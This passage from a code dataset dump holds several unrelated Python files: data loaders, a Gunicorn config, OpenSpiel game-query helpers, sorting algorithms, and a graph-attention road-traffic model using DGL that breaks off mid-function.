f.write(f\"{content:<{pad_length+1}}\")\n f.write(\"\\n\")\n\n f.write(\"#\")\n","repo_name":"Ruibin-Liu/pdbx2df","sub_path":"pdbx2df/write_pdbx.py","file_name":"write_pdbx.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19149223121","text":"# _*_ coding:utf-8 _*_\n\nimport json\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\ndef get_train_data(input_file):\n corpus = []\n labels = []\n entitys = []\n with open(input_file, 'r', encoding='utf-8') as f:\n for line in f:\n tmp = json.loads(line.strip())\n raw_contents = tmp['content']\n raw_entitys = tmp['entity']\n label = int(tmp[\"label\"])\n if label == -2:\n label = 4\n elif label == -1:\n label = 3\n for entity in [raw_entitys]:\n text = raw_contents.strip()\n corpus.append(text)\n entitys.append(entity)\n labels.append(label)\n assert len(corpus) == len(labels) == len(entitys)\n return corpus, labels, entitys\n\n\ndef 
get_test_data(input_file):\n ids = []\n corpus = []\n entitys = []\n with open(input_file, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n tmp = json.loads(line.strip())\n raw_id = tmp['id']\n raw_contents = tmp['content']\n raw_entitys = tmp['entity']\n for entity in [raw_entitys]:\n text = raw_contents.strip()\n corpus.append(text)\n ids.append(raw_id)\n entitys.append(entity)\n assert len(corpus) == len(entitys) == len(ids)\n return corpus, entitys, ids\n","repo_name":"shengch/PromptBert","sub_path":"src/utils/load_datasets.py","file_name":"load_datasets.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"30692155693","text":"# Define application module path\nwsgi_app = 'src.main:app'\n\n# Bind application to available ip address\nbind = '0.0.0.0:80'\n\n# Worker count\nworkers = 1\n\n# Force Gunicorn to use Uvicorn workers\nworker_class = 'uvicorn.workers.UvicornWorker'\n\n# Preload whole application once before forking it for workers\npreload_app = True\n\n# Write application logs to stdout\naccesslog = '-'\nerrorlog = '-'\n","repo_name":"sandermollerr/celery-setup-example","sub_path":"services/api/src/gunicorn.config.py","file_name":"gunicorn.config.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379701867","text":"import itertools\n\nfrom absl import logging # pylint:disable=unused-import\n\nimport numpy as np\n\n\ndef construct_game_queries(base_profile, num_checkpts):\n \"\"\"Constructs a list of checkpoint selection tuples to query value function.\n\n Each query tuple (key, query) where key = (pi, pj) and query is\n (p1's selected checkpt, ..., p7's selected checkpt) fixes the players in the\n game of diplomacy to be played. It may be necessary to play several games with\n the same players to form an accurate estimate of the value or payoff for each\n player as checkpts contain stochastic policies.\n\n Args:\n base_profile: list of selected checkpts for each player, i.e.,\n a sample from the player strategy profile ([x_i ~ p(x_i)])\n num_checkpts: list of ints, number of strats (or ckpts) per player\n Returns:\n Set of query tuples containing a selected checkpoint index for each player.\n \"\"\"\n new_queries = set([])\n\n num_players = len(base_profile)\n for pi, pj in itertools.combinations(range(num_players), 2):\n new_profile = list(base_profile)\n for ai in range(num_checkpts[pi]):\n new_profile[pi] = ai\n for aj in range(num_checkpts[pj]):\n new_profile[pj] = aj\n query = tuple(new_profile)\n pair = (pi, pj)\n new_queries.update([(pair, query)])\n\n return new_queries\n\n\ndef construct_game_queries_for_exp(base_profile, num_checkpts):\n \"\"\"Constructs a list of checkpoint selection tuples to query value function.\n\n Each query tuple (key, query) where key = (pi,) and query is\n (p1's selected checkpt, ..., p7's selected checkpt) fixes the players in the\n game of diplomacy to be played. 
It may be necessary to play several games with\n the same players to form an accurate estimate of the value or payoff for each\n player as checkpts contain stochastic policies.\n\n Args:\n base_profile: list of selected checkpts for each player, i.e.,\n a sample from the player strategy profile ([x_i ~ p(x_i)])\n num_checkpts: list of ints, number of strats (or ckpts) per player\n Returns:\n Set of query tuples containing a selected checkpoint index for each player.\n \"\"\"\n new_queries = set([])\n\n num_players = len(base_profile)\n for pi in range(num_players):\n new_profile = list(base_profile)\n for ai in range(num_checkpts[pi]):\n new_profile[pi] = ai\n query = tuple(new_profile)\n new_queries.update([(pi, query)])\n\n return new_queries\n\n\ndef run_games_and_record_payoffs(game_queries, evaluate_game, ckpt_to_policy):\n \"\"\"Simulate games according to game queries and return results.\n\n Args:\n game_queries: set of tuples containing indices specifying each players strat\n key_query = (agent_tuple, profile_tuple) format\n evaluate_game: callable function that takes a list of policies as argument\n ckpt_to_policy: list of maps from strat (or checkpoint) to a policy, one\n map for each player\n Returns:\n dictionary: key=key_query, value=np.array of payoffs (1 for each player)\n \"\"\"\n game_results = {}\n for key_query in game_queries:\n _, query = key_query\n policies = [ckpt_to_policy[pi][ckpt_i] for pi, ckpt_i in enumerate(query)]\n payoffs = evaluate_game(policies)\n game_results.update({key_query: payoffs})\n return game_results\n\n\ndef form_payoff_matrices(game_results, num_checkpts):\n \"\"\"Packages dictionary of game results into a payoff tensor.\n\n Args:\n game_results: dictionary of payoffs for each game evaluated, keys are\n (pair, profile) where pair is a tuple of the two agents played against\n each other and profile indicates pure joint action played by all agents\n num_checkpts: list of ints, number of strats (or ckpts) per player\n Returns:\n payoff_matrices: dict of np.arrays (2 x num_checkpts x num_checkpts) with\n payoffs for two players. 
keys are pairs above with lowest index agent\n first\n \"\"\"\n num_players = len(num_checkpts)\n payoff_matrices = {}\n for pi, pj in itertools.combinations(range(num_players), 2):\n key = (pi, pj)\n payoff_matrices[key] = np.zeros((2, num_checkpts[pi], num_checkpts[pj]))\n for key_profile, payoffs in game_results.items():\n key, profile = key_profile\n i, j = key\n ai = profile[i]\n aj = profile[j]\n payoff_matrices[key][0, ai, aj] = payoffs[i]\n payoff_matrices[key][1, ai, aj] = payoffs[j]\n return payoff_matrices\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/adidas_utils/helpers/nonsymmetric/game_runner.py","file_name":"game_runner.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"35833770738","text":"def sortList(array):\n length = len(array)\n\n for item in range(length):\n minimum = item\n\n for i in range(item + 1, length):\n if array[i] < array[minimum]:\n minimum = i\n (array[item], array[minimum]) = (array[minimum], array[item])\n return array\n\n\ndef bubbleSort(arr):\n n = len(arr)\n for i in range(n - 1):\n # reset the flag each pass so the early exit works on every pass\n swapped = False\n for j in range(0, n - i - 1):\n if arr[j] > arr[j + 1]:\n swapped = True\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n if not swapped:\n return\n\n\ndef merge(arr, l, m, r):\n n1 = m - l + 1\n n2 = r - m\n L = [0] * (n1)\n R = [0] * (n2)\n for i in range(0, n1):\n L[i] = arr[l + i]\n\n for j in range(0, n2):\n R[j] = arr[m + 1 + j]\n\n i = 0\n j = 0\n k = l\n\n while i < n1 and j < n2:\n if L[i] <= R[j]:\n arr[k] = L[i]\n i += 1\n else:\n arr[k] = R[j]\n j += 1\n k += 1\n\n while i < n1:\n arr[k] = L[i]\n i += 1\n k += 1\n\n while j < n2:\n arr[k] = R[j]\n j += 1\n k += 1\n\n\ndef mergeSort(l,r,arr):\n if l < r:\n m = l + (r - l) // 2\n # recurse with the (l, r, arr) argument order declared above\n mergeSort(l, m, arr)\n mergeSort(m + 1, r, arr)\n merge(arr, l, m, r)\n\n\ndef insertionSort(arr):\n for i in range(1, len(arr)):\n\n key = arr[i]\n j = i - 1\n while j >= 0 and key < arr[j]:\n arr[j + 1] = arr[j]\n j -= 1\n arr[j + 1] = key\n\n\ndef partition(l, r, nums):\n pivot, ptr = nums[r], l\n for i in range(l, r):\n if nums[i] <= pivot:\n nums[i], nums[ptr] = nums[ptr], nums[i]\n ptr += 1\n nums[ptr], nums[r] = nums[r], nums[ptr]\n return ptr\n\n\ndef quicksort(l, r, nums):\n if len(nums) == 1:\n return nums\n if l < r:\n pi = partition(l, r, nums)\n quicksort(l, pi - 1, nums)\n quicksort(pi + 1, r, nums)\n return nums\n\n\na = [3,4,5,1,2,6,7,100,99,98,97,96,95,80,79]\nb = [3,4,5,1,2,6,7,101,94,93,92,91,90,82,81]\nc = [3,4,5,1,2,6,7,102,89,88,87,86,85,84,83]\n\nd = a + b\nd = list(set(d)- set(c))\nprint(sortList(d))\nbubbleSort(d)\nprint(d)\nmergeSort(0,len(d)-1,d)\nprint(d)\ninsertionSort(d)\nprint(d)\nquicksort(0,len(d)-1,d)\nprint(d)\n\n","repo_name":"oltoir/ads-retake","sub_path":"TITS 5/2.5.py","file_name":"2.5.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13746048927","text":"# -*- encoding: utf-8 -*-\nimport copy\nfrom dgl._deprecate.graph import DGLGraph\nfrom dgl._ffi.function import get_global_func\nfrom numpy.lib.arraysetops import isin\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport dgl\nimport dgl.function as fn\nimport dgl.nn.pytorch as dglnn\nfrom collections import namedtuple\nimport torch.nn.functional as F\nimport copy\n# from torch.nn import LayerNorm\nfrom torch.autograd import Variable\nimport torch.nn.init as I\nimport numpy as 
np\nimport math\nfrom commonLayers import Encoder, Decoder\n\n# dgl.batch\n# DGLGraph\n# Dispatcher is a graph-based component\n\nEdgeGraph = namedtuple(\n 'EdgeGraph', ['nodes', 'edges', 'out_list', 'in_list', 'node2edge'])\n\n\nclass NLLLoss(nn.Module):\n def __init__(self, eps=1, lamb=0.5, use_weight=False):\n super(NLLLoss, self).__init__()\n self.eps = eps\n self.lamb = lamb\n self.use_weight = use_weight\n\n def forward(self, ins, target):\n '''input: (n_mu, n_sigma, e_mu, e_sigma)\n target: (batch_node_key, batch_node_value, batch_edge_key, batch_edge_value)\n batch_node_key = (N): flatten_index\n batch_node_value = (N)\n batch_edge_key = (M ): flatten_index\n batch_edge_value = (M)\n '''\n n_mu, n_sigma2, e_mu, e_sigma2 = ins\n batch_node_key, batch_node_value, batch_edge_key, batch_edge_value = target\n pre_node_mu = n_mu.take(batch_node_key)\n pre_node_sigma2 = n_sigma2.take(batch_node_key)\n pre_edge_mu = e_mu.take(batch_edge_key)\n pre_edge_sigma2 = e_sigma2.take(batch_edge_key)\n\n # print(batch_node_value.shape)\n\n # print(batch_node_value, batch_edge_value)\n # print(torch.sum(n_mu < 0), torch.sum(n_sigma2 < 0),\n # torch.sum(e_mu < 0), torch.sum(e_sigma2 < 0))\n # print(torch.sum(batch_node_value < 0),\n # torch.sum(batch_edge_value < 0))\n # print(torch.mean((batch_node_value-pre_node_mu)\n # ** 2/(self.eps+pre_node_sigma2)), torch.mean((batch_edge_value-pre_edge_mu)**2/(self.eps+pre_edge_sigma2)))\n # print(torch.mean((batch_node_value-pre_node_mu)\n # ** 2), torch.mean((batch_edge_value-pre_edge_mu)**2))\n # apply the per-sample weight column only when use_weight is enabled\n # (same convention as TestNLLLoss below)\n if not self.use_weight:\n node_loss = torch.mean(1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2))\n edge_loss = torch.mean(1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2))\n else:\n node_loss = torch.mean((1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2))*batch_node_value[:, 1])\n edge_loss = torch.mean((1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2))*batch_edge_value[:, 1])\n\n return node_loss, edge_loss, node_loss*self.lamb+edge_loss*(1-self.lamb)\n\n\nclass TestNLLLoss(nn.Module):\n def __init__(self, eps=1, lamb=0.5, kind=0, use_weight=False):\n super(TestNLLLoss, self).__init__()\n self.eps = eps\n self.lamb = lamb\n self.kind = kind\n self.use_weight = use_weight\n\n def forward(self, ins, target):\n n_mu, n_sigma2, e_mu, e_sigma2 = ins\n batch_node_key, batch_node_value, batch_edge_key, batch_edge_value = target\n pre_node_mu = n_mu.take(batch_node_key)\n pre_node_sigma2 = n_sigma2.take(batch_node_key)\n pre_edge_mu = e_mu.take(batch_edge_key)\n pre_edge_sigma2 = e_sigma2.take(batch_edge_key)\n node_loss = torch.mean(1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2)) if self.use_weight is False else torch.mean((1.0/2*torch.log(self.eps+pre_node_sigma2) +\n (batch_node_value[:, 0]-pre_node_mu)**2/(self.eps+pre_node_sigma2))*batch_node_value[:, 1])\n edge_loss = torch.mean(1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2)) if self.use_weight is False else torch.mean((1.0/2*torch.log(self.eps+pre_edge_sigma2) +\n (batch_edge_value[:, 0]-pre_edge_mu)**2/(self.eps+pre_edge_sigma2))*batch_edge_value[:, 1])\n if self.kind == 1:\n return node_loss\n elif self.kind == 2:\n return edge_loss\n else:\n return 
node_loss*self.lamb+edge_loss*(1-self.lamb)\n\n\nclass GATLayer(nn.Module):\n def __init__(self, in_dim, out_dim,\n num_heads,\n edge_type_num, # 确定边的种类\n feat_drop=0.,\n attn_drop=0.,\n negative_slope=0.2,\n residual=False,\n activation=None,\n allow_zero_in_degree=True,\n cat=True,\n node_feature_dim=None,\n edge_feature_dim=None,\n use_static_feature=False):\n super(GATLayer, self).__init__()\n if type(in_dim) is tuple:\n n_in_dim, e_in_dim = in_dim\n else:\n n_in_dim, e_in_dim = in_dim, in_dim\n self._num_heads = num_heads\n self._in_src_feats, self._in_dst_feats = n_in_dim, n_in_dim\n self._out_feats = out_dim\n self._allow_zero_in_degree = allow_zero_in_degree\n self.fc_n = nn.Linear(n_in_dim, out_dim*num_heads, bias=False)\n self.fc_e = nn.Linear(e_in_dim, out_dim*num_heads, bias=False)\n\n self._cat = cat\n self._edge_type_num = edge_type_num\n self._node_feature_dim = node_feature_dim\n self._edge_feature_dim = edge_feature_dim\n\n self.use_static_feature = use_static_feature\n\n if self.use_static_feature:\n self.attn_l = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim+node_feature_dim, self._edge_type_num)))\n self.attn_r = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim+node_feature_dim, self._edge_type_num)))\n self.attn_m = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim+edge_feature_dim, self._edge_type_num)))\n else:\n self.attn_l = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim, self._edge_type_num)))\n self.attn_r = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim, self._edge_type_num)))\n self.attn_m = nn.Parameter(\n torch.FloatTensor(size=(1, num_heads, out_dim, self._edge_type_num)))\n\n self.feat_drop = nn.Dropout(feat_drop)\n self.attn_drop = nn.Dropout(attn_drop)\n self.leaky_relu = nn.LeakyReLU(negative_slope)\n if residual:\n if self._in_dst_feats != out_dim:\n self.res_fc_n = nn.Linear(\n self._in_dst_feats, num_heads * out_dim, bias=False)\n self.res_fc_e = nn.Linear(\n self._in_dst_feats, num_heads * out_dim, bias=False)\n else:\n self.res_fc_n = Identity()\n self.res_fc_e = Identity()\n\n else:\n self.register_buffer('res_fc_n', None)\n self.register_buffer('res_fc_e', None)\n self.reset_parameters()\n self.activation = None if activation == 'none' else (\n nn.ReLU() if activation == 'relu' else nn.Sigmoid())\n\n def edge_attn_udf(self, edges):\n left = torch.bmm(\n edges.src['el'], edges.data['mask'].view(-1, self._edge_type_num, 1))\n right = torch.bmm(\n edges.dst['er'], edges.data['mask'].view(-1, self._edge_type_num, 1))\n return {'e': left+right+edges.data['em']}\n\n def edge_mean_udf(self, edges): # 使用三个求平均\n return {'ft': (edges.data['ft']+edges.src['ft']+edges.dst['ft'])/3}\n\n def forward(self, graph, feat=None):\n with graph.local_scope():\n if not self._allow_zero_in_degree:\n if (graph.in_degrees() == 0).any():\n raise DGLError('There are 0-in-degree nodes in the graph, '\n 'output for those nodes will be invalid. '\n 'This is harmful for some applications, '\n 'causing silent performance regression. '\n 'Adding self-loop on the input graph by '\n 'calling `g = dgl.add_self_loop(g)` will resolve '\n 'the issue. 
Setting ``allow_zero_in_degree`` '\n 'to be `True` when constructing this module will '\n 'suppress the check and let the code run.')\n if feat is None:\n n_feat = nn.Parameter(\n graph.ndata['raw_pro'], requires_grad=False)\n e_feat = nn.Parameter(\n graph.edata['raw_pro'], requires_grad=False)\n else:\n n_feat, e_feat = feat\n # _, _ = n_feat.shape\n # print(n_feat.shape, e_feat.shape)\n\n h_src = h_dst = self.feat_drop(n_feat)\n h_edge = self.feat_drop(e_feat)\n\n feat_src = feat_dst = self.fc_n(h_src).view(\n -1, self._num_heads, self._out_feats)\n\n feat_edge = self.fc_e(h_edge).view(\n -1, self._num_heads, self._out_feats)\n\n e_mask = graph.edata['mask'].view(-1, self._edge_type_num, 1)\n if self.use_static_feature:\n n_feat = graph.ndata['pro'].unsqueeze(1).repeat(\n 1, self._num_heads, 1)\n\n e_feat = graph.edata['pro'].unsqueeze(1).repeat(\n 1, self._num_heads, 1)\n\n # .unsqueeze(1).repeat(1,batch_size*self._num_heads,1)\n\n el = (torch.cat([feat_src, n_feat], dim=-1).unsqueeze(3).repeat(1, 1, 1, self._edge_type_num)\n * self.attn_l).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n er = (torch.cat([feat_dst, n_feat], dim=-1).unsqueeze(3).repeat(\n 1, 1, 1, self._edge_type_num)*self.attn_r).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n em = (torch.cat([feat_edge, e_feat], dim=-1).unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_m).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n\n else:\n el = (feat_src.unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_l).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n er = (feat_dst.unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_r).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n em = (feat_edge.unsqueeze(3).repeat(1, 1, 1, self._edge_type_num) *\n self.attn_m).sum(dim=-2).view(-1, self._num_heads, self._edge_type_num)\n em = torch.bmm(em, e_mask)\n\n graph.edata.update({'em': em})\n feat_src = feat_src.view(-1, self._num_heads, self._out_feats)\n\n # graph.edata.update({'ft': feat_edge})\n\n graph.srcdata.update({'ft': feat_src, 'el': el})\n graph.dstdata.update({'er': er})\n\n # compute edge attention, el and er are a_l Wh_i and a_r Wh_j respectively.\n # graph.apply_edges(fn.u_add_e('el', 'em', 'elm'))\n # graph.apply_edges(fn.e_add_v('elm','er','e'))\n graph.apply_edges(self.edge_attn_udf)\n e = self.leaky_relu(graph.edata.pop('e'))\n # compute softmax\n graph.edata['a'] = self.attn_drop(dglnn.edge_softmax(graph, e))\n # message passing\n graph.update_all(fn.u_mul_e('ft', 'a', 'm'),\n fn.sum('m', 'ft'))\n # graph.apply_edges(self.edge_feat_udf)\n rst_n = graph.dstdata['ft']\n\n graph.edata.update({'ft': feat_edge})\n graph.apply_edges(self.edge_mean_udf)\n\n rst_e = graph.edata.pop('ft')\n\n # residual\n if self.res_fc_n is not None and self.res_fc_e is not None:\n resval_n = self.res_fc_n(h_dst).view(\n h_dst.shape[0], -1, self._out_feats)\n resval_e = self.res_fc_e(h_edge).view(\n h_edge.shape[0], -1, self._out_feats)\n rst_n = rst_n + resval_n\n rst_e = rst_e + resval_e\n\n if self._cat:\n rst_n = rst_n.view(-1, self._num_heads *\n self._out_feats) # 最后用于改变结果\n rst_e = rst_e.view(-1, self._num_heads*self._out_feats)\n else:\n rst_n = rst_n.view(-1, self._num_heads,\n self._out_feats).mean(1) # 不改维度\n rst_e = rst_e.view(-1, self._num_heads,\n self._out_feats).mean(1) # 不改变\n # activation\n if self.activation:\n rst_n = self.activation(rst_n)\n rst_e = self.activation(rst_e)\n return rst_n, rst_e\n\n def reset_parameters(self):\n 
\"\"\"Reinitialize learnable parameters.\"\"\"\n gain = nn.init.calculate_gain('relu')\n nn.init.xavier_normal_(self.fc_n.weight, gain=gain)\n nn.init.xavier_normal_(self.fc_e.weight, gain=gain)\n # print(self.attn_l.shape)\n nn.init.xavier_normal_(self.attn_l, gain=gain)\n nn.init.xavier_normal_(self.attn_r, gain=gain)\n nn.init.xavier_normal_(self.attn_m, gain=gain)\n if isinstance(self.res_fc_n, nn.Linear):\n nn.init.xavier_normal_(self.res_fc_n.weight, gain=gain)\n nn.init.xavier_normal_(self.res_fc_e.weight, gain=gain)\n\n\nclass GAT(nn.Module):\n def __init__(self, in_dim, num_layers,\n num_hidden,\n out_dim,\n heads,\n edge_type_num,\n activation,\n feat_drop,\n attn_drop,\n negative_slope,\n residual,\n node_feature_dim=None,\n edge_feature_dim=None,\n use_static_feature=False\n ):\n # self.edge_graph = args['edge_graph'] # type: EdgeGraph\n # 根据edge_graph\n super(GAT, self).__init__()\n # self.g = g\n self.num_layers = num_layers\n self.gat_layers = nn.ModuleList()\n self.i_gat_layers = nn.ModuleList()\n self.activation = activation\n # input projection (no residual)\n self.gat_layers.append(GATLayer(\n in_dim, num_hidden, heads[0], edge_type_num,\n feat_drop, attn_drop, negative_slope, False, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n self.i_gat_layers.append(GATLayer(\n in_dim, num_hidden, heads[0], edge_type_num,\n feat_drop, attn_drop, negative_slope, False, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n\n # hidden layers\n for l in range(1, num_layers):\n # due to multi-head, the in_dim = num_hidden * num_heads\n # print(l, num_layers, heads)\n self.gat_layers.append(GATLayer(\n num_hidden * heads[l-1], num_hidden, heads[l], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n self.i_gat_layers.append(GATLayer(\n num_hidden * heads[l-1], num_hidden, heads[l], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, self.activation, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n # output projection\n self.gat_layers.append(GATLayer(\n num_hidden * heads[-2], out_dim, heads[-1], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, None, cat=False, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n self.i_gat_layers.append(GATLayer(\n num_hidden * heads[-2], out_dim, heads[-1], edge_type_num,\n feat_drop, attn_drop, negative_slope, residual, None, cat=False, node_feature_dim=node_feature_dim,\n edge_feature_dim=edge_feature_dim, use_static_feature=use_static_feature))\n\n def forward(self, g, inv_g):\n # h = inputs\n h = None\n # print(\"ok1\")\n for l in range(self.num_layers):\n h_n, h_e = self.gat_layers[l](g, h)\n ih_n, ih_e = self.i_gat_layers[l](inv_g, h)\n h = (h_n+ih_n, h_e+ih_e)\n # print(l, h[0].shape, h[1].shape)\n # output projection\n h_n, h_e = self.gat_layers[-1](g, h)\n ih_n, ih_e = self.i_gat_layers[-1](inv_g, h)\n # print(h_n.shape, h_e.shape)\n # logits = self.gat_layers[-1](g, h) + self.i_gat_layers[-1](inv_g, h)\n return (h_n+ih_n, h_e+ih_e)\n\n# class Patcher Cell 包含一个GAT+一个GRU\n# '''GAT解决对于input的修改,'''\n\n\n# transformer decoder\n\nGATParam = namedtuple('GATParam', ['in_dim', 'num_layers', 
'num_hidden', 'out_dim', 'heads', 'edge_type_num', 'activation',\n 'feat_drop', 'attn_drop', 'negtive_slope', 'residual', 'node_feature_dim', 'edge_feature_dim', 'use_static_feature'])\n\nGRUParam = namedtuple('GRUParam', ['input_size', 'hidden_size',\n 'num_layers', 'bias', 'batch_first', 'dropout', 'bidirectional'])\n\nGRUCellParam = namedtuple('GRUCellParam', ['input_size', 'hidden_size'])\n\n\nclass RoadNetwork:\n def __init__(self, args):\n # 路网的空间属性信息\n self.node2edge_dict = args['node2edge_dict'] # 节点tuple转换到边id\n self.edge2node_dict = args['edge2node_dict']\n self.input_dict = args['input_dict'] # 每个节点对应到他的入度节点\n self.output_dict = args['output_dict'] # 每个节点对应到他的出度节点\n self.node_dict = args['node_dict'] # 节点的属性信息\n # {288416374: [0.6651350455486061, 0.8263341778903948, 3, 3]} (node id: [经度比率,维度比率,入度,出度])\n self.edge_dict = args['edge_dict'] # 边的属性信息\n '''{0: [0.6651350455486061,0.8263341778903948,0.6628707608956127,0.827280970796094,\n 1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0, #highway\n 0,0, #oneway\n 0,1,0,0, #lanes\n 1,0, # bridges\n 1, #junction\n 0, # tunel\n 0.020517, #length (km)\n 0.2 # maxspeed (100km/h)\n ]} '''\n # 边的id转到index(数值tensor的第一维度)\n self.edge_id2index_dict = args['edge_id2index_dict']\n # 两条边的id转到index(数值tensor的第一维度)\n self.turning_dict = args['turning_dict']\n self.edge_graph = self.buidEdgeGraph() # 五元组的表现形式(点,边,点的入度,点的出度,点对到边的映射)\n self.turning_types = ['back', 'forth', 'left', 'right']\n\n def buildDglGraph(self):\n assert self.edge_graph is not None\n source_list = []\n target_list = []\n edge_pros = []\n edge_mask = []\n for k in range(len(self.edge_graph.edges)):\n v = self.edge_graph.edges[k]\n source_list.append(v[1][0])\n target_list.append(v[1][1])\n edge_pros.append(v[2])\n edge_mask.append([0 for i in range(v[0])]+[1] +\n [0 for i in range(len(self.turning_types)-v[0]-1)])\n # edge_mintime.append(v[2][-2]/v[2][-1]*60.0)\n nodes_pro = []\n node_mintime = []\n for i in range(len(self.edge_graph.nodes)):\n v = self.edge_graph.nodes[i]\n nodes_pro.append(v)\n node_mintime.append(v[-2]/v[-1]*60.0)\n g = dgl.graph((torch.tensor(source_list), torch.tensor(\n target_list)), num_nodes=len(self.edge_dict))\n\n inv_g = dgl.graph((torch.tensor(target_list), torch.tensor(\n source_list)), num_nodes=len(self.edge_dict))\n print(type(g), type(inv_g))\n\n g.ndata['raw_pro'] = torch.FloatTensor(nodes_pro) # 赋予节点相关的属性\n inv_g.ndata['raw_pro'] = torch.FloatTensor(nodes_pro)\n\n g.edata['raw_pro'] = torch.FloatTensor(edge_pros)\n g.edata['mask'] = torch.FloatTensor(edge_mask)\n\n inv_g.edata['raw_pro'] = torch.FloatTensor(edge_pros)\n inv_g.edata['mask'] = torch.FloatTensor(edge_mask)\n # inv_g.edata['mintime'] = torch.FloatTensor(edge_mintime)\n\n g.ndata['mintime'] = torch.FloatTensor(node_mintime)\n\n return g, inv_g\n\n # 构建dgl能够识别的异构图(主要是获得异构图, 建立边的映射关系)\n def buildHeteroGraph(self):\n assert self.edge_graph is not None\n graph_keys = [(\"link\", ty, \"link\") for ty in self.turning_types]\n graph_data = {}\n edge_pro_dict = {}\n for i, key in enumerate(graph_keys):\n sources = []\n targets = []\n edge_pros = []\n for k in range(len(self.edge_graph.edges)):\n v = self.edge_graph.edges[k]\n if v[0] == i:\n sources.append(v[1][0])\n targets.append(v[1][1])\n edge_pros.append(v[2])\n graph_data[key] = (torch.tensor(sources), torch.tensor(targets))\n edge_pro_dict[self.turning_types[i]] = edge_pros\n\n g = dgl.heterograph(graph_data)\n\n # 构建逆向的图\n inverse_graph_data = {}\n for k, v in graph_data.items():\n inverse_graph_data[k] = (v[1], v[0])\n\n inv_g = 
dgl.heterograph(inverse_graph_data)\n\n        # Collect the node attributes\n        nodes_pro = []\n        for i in range(len(self.edge_graph.nodes)):\n            nodes_pro.append(self.edge_graph.nodes[i])\n        g.ndata['pro'] = torch.FloatTensor(nodes_pro)  # attach the node attributes\n        inv_g.ndata['pro'] = torch.FloatTensor(nodes_pro)\n\n        for k, v in edge_pro_dict.items():\n            g.edges[k].data['pro'] = torch.FloatTensor(v)\n            inv_g.edges[k].data['pro'] = torch.FloatTensor(v)\n\n        return g, inv_g\n\n    # Build a graph whose nodes are road edges and whose edges are the connections between them (edge types are required)\n\n    def buidEdgeGraph(self):\n        nodes = {}  # maps every edge id to its attributes\n        for k, v in self.edge_dict.items():\n            nodes[self.edge_id2index_dict[k]] = v\n        edges = {}  # every turning id and the attributes it maps to\n        out_dict = {}  # topology between nodes\n        in_dict = {}\n        node2edge_dict = {}\n        for k, v in self.turning_dict.items():\n            e1, e2 = k\n            n1 = self.edge2node_dict[e1][1]\n            n2 = self.edge2node_dict[e2][0]\n            assert n1 == n2\n            e1_pro = self.edge_dict[e1]\n            e2_pro = self.edge_dict[e2]\n            n_pro = self.node_dict[n1]\n            # compute the cosine of the angle between the two road segments\n            vector1 = np.array([e1_pro[2]-e1_pro[0], e1_pro[3]-e1_pro[1]])\n            vector2 = np.array([e2_pro[2]-e2_pro[0], e2_pro[3]-e2_pro[1]])\n            cos_sim = np.dot(vector1, vector2) / \\\n                (np.linalg.norm(vector1)*(np.linalg.norm(vector2)))\n            #\n            if cos_sim <= -1+1e-3:  # U-turn\n                type_turning = 0\n            elif cos_sim >= np.cos(np.pi*1/4):  # a turn of less than 45 degrees counts as going straight\n                type_turning = 1\n            else:  # left or right turn (rotate the first segment onto the positive x-axis; if the y value of the end point of the second segment is positive it is a left turn, otherwise a right turn)\n                cos1 = vector1[0]/np.linalg.norm(vector1)\n      